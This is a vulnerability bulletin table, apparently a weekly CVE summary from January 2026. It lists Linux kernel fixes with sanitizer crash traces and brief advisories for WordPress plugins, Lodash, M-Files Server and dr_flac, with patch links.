| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: use skb_vlan_inet_prepare() in __ip6_tnl_rcv() Blamed commit did not take care of VLAN encapsulations as spotted by syzbot [1]. Use skb_vlan_inet_prepare() instead of pskb_inet_may_pull(). [1] BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321 __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] IP6_ECN_decapsulate+0x7a8/0x1fa0 include/net/inet_ecn.h:321 ip6ip6_dscp_ecn_decapsulate+0x16f/0x1b0 net/ipv6/ip6_tunnel.c:729 __ip6_tnl_rcv+0xed9/0x1b50 net/ipv6/ip6_tunnel.c:860 ip6_tnl_rcv+0xc3/0x100 net/ipv6/ip6_tunnel.c:903 gre_rcv+0x1529/0x1b90 net/ipv6/ip6_gre.c:-1 ip6_protocol_deliver_rcu+0x1c89/0x2c60 net/ipv6/ip6_input.c:438 ip6_input_finish+0x1f4/0x4a0 net/ipv6/ip6_input.c:489 NF_HOOK include/linux/netfilter.h:318 [inline] ip6_input+0x9c/0x330 net/ipv6/ip6_input.c:500 ip6_mc_input+0x7ca/0xc10 net/ipv6/ip6_input.c:590 dst_input include/net/dst.h:474 [inline] ip6_rcv_finish+0x958/0x990 net/ipv6/ip6_input.c:79 NF_HOOK include/linux/netfilter.h:318 [inline] ipv6_rcv+0xf1/0x3c0 net/ipv6/ip6_input.c:311 __netif_receive_skb_one_core net/core/dev.c:6139 [inline] __netif_receive_skb+0x1df/0xac0 net/core/dev.c:6252 netif_receive_skb_internal net/core/dev.c:6338 [inline] netif_receive_skb+0x57/0x630 net/core/dev.c:6397 tun_rx_batched+0x1df/0x980 drivers/net/tun.c:1485 tun_get_user+0x5c0e/0x6c60 drivers/net/tun.c:1953 tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0xbe2/0x15d0 fs/read_write.c:686 ksys_write fs/read_write.c:738 [inline] __do_sys_write fs/read_write.c:749 [inline] __se_sys_write fs/read_write.c:746 [inline] __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746 x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:4960 [inline] slab_alloc_node mm/slub.c:5263 [inline] kmem_cache_alloc_node_noprof+0x9e7/0x17a0 mm/slub.c:5315 kmalloc_reserve+0x13c/0x4b0 net/core/skbuff.c:586 __alloc_skb+0x805/0x1040 net/core/skbuff.c:690 alloc_skb include/linux/skbuff.h:1383 [inline] alloc_skb_with_frags+0xc5/0xa60 net/core/skbuff.c:6712 sock_alloc_send_pskb+0xacc/0xc60 net/core/sock.c:2995 tun_alloc_skb drivers/net/tun.c:1461 [inline] tun_get_user+0x1142/0x6c60 drivers/net/tun.c:1794 tun_chr_write_iter+0x3e9/0x5c0 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0xbe2/0x15d0 fs/read_write.c:686 ksys_write fs/read_write.c:738 [inline] __do_sys_write fs/read_write.c:749 [inline] __se_sys_write fs/read_write.c:746 [inline] __x64_sys_write+0x1fb/0x4d0 fs/read_write.c:746 x64_sys_call+0x30ab/0x3e70 arch/x86/include/generated/asm/syscalls_64.h:2 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd3/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f CPU: 0 UID: 0 PID: 6465 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(none) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 | 2026-01-25 | not yet calculated | CVE-2026-23003 | https://git.kernel.org/stable/c/df5ffde9669314500809bc498ae73d6d3d9519ac https://git.kernel.org/stable/c/b9f915340f25cae1562f18e1eb52deafca328414 https://git.kernel.org/stable/c/81c734dae203757fb3c9eee6f9896386940776bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() syzbot was able to crash the kernel in rt6_uncached_list_flush_dev() in an interesting way [1] Crash happens in list_del_init()/INIT_LIST_HEAD() while writing list->prev, while the prior write on list->next went well. static inline void INIT_LIST_HEAD(struct list_head *list) { WRITE_ONCE(list->next, list); // This went well WRITE_ONCE(list->prev, list); // Crash, @list has been freed. } Issue here is that rt6_uncached_list_del() did not attempt to lock ul->lock, as list_empty(&rt->dst.rt_uncached) returned true because the WRITE_ONCE(list->next, list) happened on the other CPU. We might use list_del_init_careful() and list_empty_careful(), or make sure rt6_uncached_list_del() always grabs the spinlock whenever rt->dst.rt_uncached_list has been set. A similar fix is needed for IPv4. [1] BUG: KASAN: slab-use-after-free in INIT_LIST_HEAD include/linux/list.h:46 [inline] BUG: KASAN: slab-use-after-free in list_del_init include/linux/list.h:296 [inline] BUG: KASAN: slab-use-after-free in rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline] BUG: KASAN: slab-use-after-free in rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020 Write of size 8 at addr ffff8880294cfa78 by task kworker/u8:14/3450 CPU: 0 UID: 0 PID: 3450 Comm: kworker/u8:14 Tainted: G L syzkaller #0 PREEMPT_{RT,(full)} Tainted: [L]=SOFTLOCKUP Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Workqueue: netns cleanup_net Call Trace: <TASK> dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 INIT_LIST_HEAD include/linux/list.h:46 [inline] list_del_init include/linux/list.h:296 [inline] rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline] rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020 addrconf_ifdown+0x143/0x18a0 net/ipv6/addrconf.c:3853 addrconf_notify+0x1bc/0x1050 net/ipv6/addrconf.c:-1 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_extack net/core/dev.c:2268 [inline] call_netdevice_notifiers net/core/dev.c:2282 [inline] netif_close_many+0x29c/0x410 net/core/dev.c:1785 unregister_netdevice_many_notify+0xb50/0x2330 net/core/dev.c:12353 ops_exit_rtnl_list net/core/net_namespace.c:187 [inline] ops_undo_list+0x3dc/0x990 net/core/net_namespace.c:248 cleanup_net+0x4de/0x7b0 net/core/net_namespace.c:696 process_one_work kernel/workqueue.c:3257 [inline] process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> Allocated by task 803: kasan_save_stack mm/kasan/common.c:57 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:78 unpoison_slab_object mm/kasan/common.c:340 [inline] __kasan_slab_alloc+0x6c/0x80 mm/kasan/common.c:366 kasan_slab_alloc include/linux/kasan.h:253 [inline] slab_post_alloc_hook mm/slub.c:4953 [inline] slab_alloc_node mm/slub.c:5263 [inline] kmem_cache_alloc_noprof+0x18d/0x6c0 mm/slub.c:5270 dst_alloc+0x105/0x170 net/core/dst.c:89 ip6_dst_alloc net/ipv6/route.c:342 [inline] icmp6_dst_alloc+0x75/0x460 net/ipv6/route.c:3333 mld_sendpack+0x683/0xe60 net/ipv6/mcast.c:1844 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693 process_one_work kernel/workqueue.c:3257 [inline] process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entr ---truncated--- | 2026-01-25 | not yet calculated | CVE-2026-23004 | https://git.kernel.org/stable/c/722de945216144af7cd4d39bdeb936108d2595a7 https://git.kernel.org/stable/c/9a6f0c4d5796ab89b5a28a890ce542344d58bd69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1 When loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in response to a guest WRMSR, clear XFD-disabled features in the saved (or to be restored) XSTATE_BV to ensure KVM doesn't attempt to load state for features that are disabled via the guest's XFD. Because the kernel executes XRSTOR with the guest's XFD, saving XSTATE_BV[i]=1 with XFD[i]=1 will cause XRSTOR to #NM and panic the kernel. E.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV: ------------[ cut here ]------------ WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848 Modules linked in: kvm_intel kvm irqbypass CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:exc_device_not_available+0x101/0x110 Call Trace: <TASK> asm_exc_device_not_available+0x1a/0x20 RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90 switch_fpu_return+0x4a/0xb0 kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm] kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x62/0x940 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> ---[ end trace 0000000000000000 ]--- This can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1, and a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler's call to fpu_update_guest_xfd(). and if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE: ------------[ cut here ]------------ WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867 Modules linked in: kvm_intel kvm irqbypass CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:exc_device_not_available+0x101/0x110 Call Trace: <TASK> asm_exc_device_not_available+0x1a/0x20 RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90 fpu_swap_kvm_fpstate+0x6b/0x120 kvm_load_guest_fpu+0x30/0x80 [kvm] kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm] kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x62/0x940 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> ---[ end trace 0000000000000000 ]--- The new behavior is consistent with the AMX architecture. Per Intel's SDM, XSAVE saves XSTATE_BV as '0' for components that are disabled via XFD (and non-compacted XSAVE saves the initial configuration of the state component): If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i, the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1; instead, it operates as if XINUSE[i] = 0 (and the state component was in its initial state): it saves bit i of XSTATE_BV field of the XSAVE header as 0; in addition, XSAVE saves the initial configuration of the state component (the other instructions do not save state component i). Alternatively, KVM could always do XRSTOR with XFD=0, e.g. by using a constant XFD based on the set of enabled features when XSAVEing for a struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled features can only happen in the above interrupt case, or in similar scenarios involving preemption on preemptible kernels, because fpu_swap_kvm_fpstate()'s call to save_fpregs_to_fpstate() saves the outgoing FPU state with the current XFD; and that is (on all but the first WRMSR to XFD) the guest XFD. Therefore, XFD can only go out of sync with XSTATE_BV in the above interrupt case, or in similar scenarios involving preemption on preemptible kernels, and we can consider it (de facto) part of KVM ABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features. [Move clea ---truncated--- | 2026-01-25 | not yet calculated | CVE-2026-23005 | https://git.kernel.org/stable/c/f577508cc8a0adb8b4ebe9480bba7683b6149930 https://git.kernel.org/stable/c/eea6f395ca502c4528314c8112da9b5d65f685eb https://git.kernel.org/stable/c/b45f721775947a84996deb5c661602254ce25ce6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: tlv320adcx140: fix null pointer The "snd_soc_component" in "adcx140_priv" was only used once but never set. It was only used for reaching "dev" which is already present in "adcx140_priv". | 2026-01-25 | not yet calculated | CVE-2026-23006 | https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929 https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: zero non-PI portion of auto integrity buffer The auto-generated integrity buffer for writes needs to be fully initialized before being passed to the underlying block device, otherwise the uninitialized memory can be read back by userspace or anyone with physical access to the storage device. If protection information is generated, that portion of the integrity buffer is already initialized. The integrity data is also zeroed if PI generation is disabled via sysfs or the PI tuple size is 0. However, this misses the case where PI is generated and the PI tuple size is nonzero, but the metadata size is larger than the PI tuple. In this case, the remainder ("opaque") of the metadata is left uninitialized. Generalize the BLK_INTEGRITY_CSUM_NONE check to cover any case when the metadata is larger than just the PI tuple. | 2026-01-25 | not yet calculated | CVE-2026-23007 | https://git.kernel.org/stable/c/d6072557b90e0c557df319a56f4a9dc482706d2c https://git.kernel.org/stable/c/ca22c566b89164f6e670af56ecc45f47ef3df819 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Fix KMS with 3D on HW version 10 HW version 10 does not have GB Surfaces so there is no backing buffer for surface backed FBs. This would result in a nullptr dereference and crash the driver causing a black screen. | 2026-01-25 | not yet calculated | CVE-2026-23008 | https://git.kernel.org/stable/c/a91bdd21d5efb3072beefbec13762b7722200c49 https://git.kernel.org/stable/c/d9186faeae6efb7d0841a5e8eb213ff4c7966614 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xhci: sideband: don't dereference freed ring when removing sideband endpoint xhci_sideband_remove_endpoint() incorrectly assumes that the endpoint is running and has a valid transfer ring. Lianqin reported a crash during suspend/wake-up stress testing, and found the cause to be dereferencing a non-existing transfer ring 'ep->ring' during xhci_sideband_remove_endpoint(). The endpoint and its ring may be in unknown state if this function is called after xHCI was reinitialized in resume (lost power), or if device is being re-enumerated, disconnected or endpoint already dropped. Fix this by both removing unnecessary ring access, and by checking ep->ring exists before dereferencing it. Also make sure endpoint is running before attempting to stop it. Remove the xhci_initialize_ring_info() call during sideband endpoint removal as it only initializes ring structure enqueue, dequeue and cycle state values to their starting values without changing actual hardware enqueue, dequeue and cycle state. Leaving them out of sync is worse than leaving it as it is. The endpoint will get freed after this in most usecases. If the (audio) class driver wants to reuse the endpoint after offload then it is up to the class driver to ensure endpoint is properly set up. | 2026-01-25 | not yet calculated | CVE-2026-23009 | https://git.kernel.org/stable/c/34f6634dba87ef72b3c3a3a524be663adef7ab42 https://git.kernel.org/stable/c/dd83dc1249737b837ac5d57c81f2b0977c613d9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix use-after-free in inet6_addr_del(). syzbot reported use-after-free of inet6_ifaddr in inet6_addr_del(). [0] The cited commit accidentally moved ipv6_del_addr() for mngtmpaddr before reading its ifp->flags for temporary addresses in inet6_addr_del(). Let's move ipv6_del_addr() down to fix the UAF. [0]: BUG: KASAN: slab-use-after-free in inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117 Read of size 4 at addr ffff88807b89c86c by task syz.3.1618/9593 CPU: 0 UID: 0 PID: 9593 Comm: syz.3.1618 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xcd/0x630 mm/kasan/report.c:482 kasan_report+0xe0/0x110 mm/kasan/report.c:595 inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117 addrconf_del_ifaddr+0x11e/0x190 net/ipv6/addrconf.c:3181 inet6_ioctl+0x1e5/0x2b0 net/ipv6/af_inet6.c:582 sock_do_ioctl+0x118/0x280 net/socket.c:1254 sock_ioctl+0x227/0x6b0 net/socket.c:1375 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f164cf8f749 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f164de64038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007f164d1e5fa0 RCX: 00007f164cf8f749 RDX: 0000200000000000 RSI: 0000000000008936 RDI: 0000000000000003 RBP: 00007f164d013f91 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f164d1e6038 R14: 00007f164d1e5fa0 R15: 00007ffde15c8288 </TASK> Allocated by task 9593: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:397 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:414 kmalloc_noprof include/linux/slab.h:957 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] ipv6_add_addr+0x4e3/0x2010 net/ipv6/addrconf.c:1120 inet6_addr_add+0x256/0x9b0 net/ipv6/addrconf.c:3050 addrconf_add_ifaddr+0x1fc/0x450 net/ipv6/addrconf.c:3160 inet6_ioctl+0x103/0x2b0 net/ipv6/af_inet6.c:580 sock_do_ioctl+0x118/0x280 net/socket.c:1254 sock_ioctl+0x227/0x6b0 net/socket.c:1375 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 6099: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:584 poison_slab_object mm/kasan/common.c:252 [inline] __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284 kasan_slab_free include/linux/kasan.h:234 [inline] slab_free_hook mm/slub.c:2540 [inline] slab_free_freelist_hook mm/slub.c:2569 [inline] slab_free_bulk mm/slub.c:6696 [inline] kmem_cache_free_bulk mm/slub.c:7383 [inline] kmem_cache_free_bulk+0x2bf/0x680 mm/slub.c:7362 kfree_bulk include/linux/slab.h:830 [inline] kvfree_rcu_bulk+0x1b7/0x1e0 mm/slab_common.c:1523 kvfree_rcu_drain_ready mm/slab_common.c:1728 [inline] kfree_rcu_monitor+0x1d0/0x2f0 mm/slab_common.c:1801 process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257 process_scheduled_works kernel/workqu ---truncated--- | 2026-01-25 | not yet calculated | CVE-2026-23010 | https://git.kernel.org/stable/c/2684610a9c9c53f262fd864fa5c407e79f304804 https://git.kernel.org/stable/c/8b6dcb565e419846bd521e31d5e1f98e4d0e1179 https://git.kernel.org/stable/c/ddf96c393a33aef4887e2e406c76c2f8cda1419c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: ip_gre: make ipgre_header() robust Analog to commit db5b4e39c4e6 ("ip6_gre: make ip6gre_header() robust") Over the years, syzbot found many ways to crash the kernel in ipgre_header() [1]. This involves team or bonding drivers ability to dynamically change their dev->needed_headroom and/or dev->hard_header_len In this particular crash mld_newpack() allocated an skb with a too small reserve/headroom, and by the time mld_sendpack() was called, syzbot managed to attach an ipgre device. [1] skbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0 kernel BUG at net/core/skbuff.c:213 ! Oops: invalid opcode: 0000 [#1] SMP KASAN PTI CPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Workqueue: mld mld_ifc_work RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213 Call Trace: <TASK> skb_under_panic net/core/skbuff.c:223 [inline] skb_push+0xc3/0xe0 net/core/skbuff.c:2641 ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897 dev_hard_header include/linux/netdevice.h:3436 [inline] neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247 NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318 mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693 process_one_work kernel/workqueue.c:3257 [inline] process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 | 2026-01-25 | not yet calculated | CVE-2026-23011 | https://git.kernel.org/stable/c/aa57bfea4674e6da8104fa3a37760a6f5f255dad https://git.kernel.org/stable/c/554201ed0a8f4d32e719f42caeaeb2735a9ed6ca https://git.kernel.org/stable/c/e67c577d89894811ce4dcd1a9ed29d8b63476667 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: remove call_control in inactive contexts If damon_call() is executed against a DAMON context that is not running, the function returns error while keeping the damon_call_control object linked to the context's call_controls list. Let's suppose the object is deallocated after the damon_call(), and yet another damon_call() is executed against the same context. The function tries to add the new damon_call_control object to the call_controls list, which still has the pointer to the previous damon_call_control object, which is deallocated. As a result, use-after-free happens. This can actually be triggered using the DAMON sysfs interface. It is not easily exploitable since it requires the sysfs write permission and making definitely weird file writes, though. Please refer to the report for more details about the issue reproduction steps. Fix the issue by making two changes. Firstly, move the final kdamond_call() for cancelling all existing damon_call() requests from terminating DAMON context to be done before the ctx->kdamond reset. This makes any code that sees NULL ctx->kdamond can safely assume the context may not access damon_call() requests anymore. Secondly, let damon_call() to cleanup the damon_call_control objects that were added to the already-terminated DAMON context, before returning the error. | 2026-01-25 | not yet calculated | CVE-2026-23012 | https://git.kernel.org/stable/c/23b061f421eef03647b512f3df48861706c87db3 https://git.kernel.org/stable/c/f9132fbc2e83baf2c45a77043672a63a675c9394 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: octeon_ep_vf: fix free_irq dev_id mismatch in IRQ rollback octep_vf_request_irqs() requests MSI-X queue IRQs with dev_id set to ioq_vector. If request_irq() fails part-way, the rollback loop calls free_irq() with dev_id set to 'oct', which does not match the original dev_id and may leave the irqaction registered. This can keep IRQ handlers alive while ioq_vector is later freed during unwind/teardown, leading to a use-after-free or crash when an interrupt fires. Fix the error path to free IRQs with the same ioq_vector dev_id used during request_irq(). | 2026-01-25 | not yet calculated | CVE-2026-23013 | https://git.kernel.org/stable/c/aa05a8371ae4a452df623f7202c72409d3c50e40 https://git.kernel.org/stable/c/aa4c066229b05fc3d3c5f42693d25b1828533b6e https://git.kernel.org/stable/c/f93fc5d12d69012788f82151bee55fce937e1432 |
| linux4me2--Menu In Post | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in linux4me2 Menu In Post menu-in-post allows DOM-Based XSS. This issue affects Menu In Post: from n/a through <= 1.4.1. | 2026-01-22 | not yet calculated | CVE-2026-22349 | https://patchstack.com/database/Wordpress/Plugin/menu-in-post/vulnerability/wordpress-menu-in-post-plugin-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| livemesh--Livemesh Addons for WPBakery Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in livemesh Livemesh Addons for WPBakery Page Builder addons-for-visual-composer allows Stored XSS. This issue affects Livemesh Addons for WPBakery Page Builder: from n/a through <= 3.9.4. | 2026-01-23 | not yet calculated | CVE-2026-24594 | https://patchstack.com/database/Wordpress/Plugin/addons-for-visual-composer/vulnerability/wordpress-livemesh-addons-for-wpbakery-page-builder-plugin-3-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Lodash--Lodash | Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes. The issue permits deletion of properties but does not allow overwriting their original behavior. This issue is patched in 4.17.23. | 2026-01-21 | not yet calculated | CVE-2025-13465 | https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg |
| LogicHunt--Logo Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt Logo Slider logo-slider-wp allows Stored XSS. This issue affects Logo Slider: from n/a through <= 4.9.0. | 2026-01-23 | not yet calculated | CVE-2026-24626 | https://patchstack.com/database/Wordpress/Plugin/logo-slider-wp/vulnerability/wordpress-logo-slider-plugin-4-9-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Ludwig You--WPMasterToolKit | Missing Authorization vulnerability in Ludwig You WPMasterToolKit wpmastertoolkit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPMasterToolKit: from n/a through <= 2.14.0. | 2026-01-22 | not yet calculated | CVE-2026-24388 | https://patchstack.com/database/Wordpress/Plugin/wpmastertoolkit/vulnerability/wordpress-wpmastertoolkit-plugin-2-14-0-broken-access-control-vulnerability?_s_id=cve |
| M-Files Corporation--M-Files Server | Denial-of-service vulnerability in M-Files Server versions before 26.1.15632.3 allows an authenticated attacker with vault administrator privileges to crash the M-Files Server process by calling a vulnerable API endpoint. | 2026-01-21 | not yet calculated | CVE-2026-0663 | https://product.m-files.com/security-advisories/cve-2026-0663/ |
| mackron--dr_flac | dr_flac, an audio decoder within the dr_libs toolset, contains an integer overflow vulnerability due to trusting the totalPCMFrameCount field from FLAC metadata before calculating buffer size, allowing an attacker with a specially crafted file to perform DoS against programs using the tool. | 2026-01-20 | not yet calculated | CVE-2025-14369 | https://github.com/mackron/dr_libs/commit/b2197b2eb7bb609df76315bebf44db4ec2a1aed0 |
| magentech--MaxShop | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magentech MaxShop sw_maxshop allows PHP Local File Inclusion. This issue affects MaxShop: from n/a through <= 3.6.20. | 2026-01-22 | not yet calculated | CVE-2025-69047 | https://patchstack.com/database/Wordpress/Theme/sw_maxshop/vulnerability/wordpress-maxshop-theme-3-6-20-local-file-inclusion-vulnerability?_s_id=cve |
| Mahmudul Hasan Arif--FluentBoards | Missing Authorization vulnerability in Mahmudul Hasan Arif FluentBoards fluent-boards allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FluentBoards: from n/a through <= 1.91.1. | 2026-01-23 | not yet calculated | CVE-2026-24561 | https://patchstack.com/database/Wordpress/Plugin/fluent-boards/vulnerability/wordpress-fluentboards-plugin-1-91-1-broken-access-control-vulnerability?_s_id=cve |
| MailerLite--MailerLite WooCommerce integration | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MailerLite MailerLite - WooCommerce integration woo-mailerlite allows SQL Injection. This issue affects MailerLite - WooCommerce integration: from n/a through <= 3.1.2. | 2026-01-22 | not yet calculated | CVE-2025-67945 | https://patchstack.com/database/Wordpress/Plugin/woo-mailerlite/vulnerability/wordpress-mailerlite-woocommerce-integration-plugin-3-1-2-sql-injection-vulnerability?_s_id=cve |
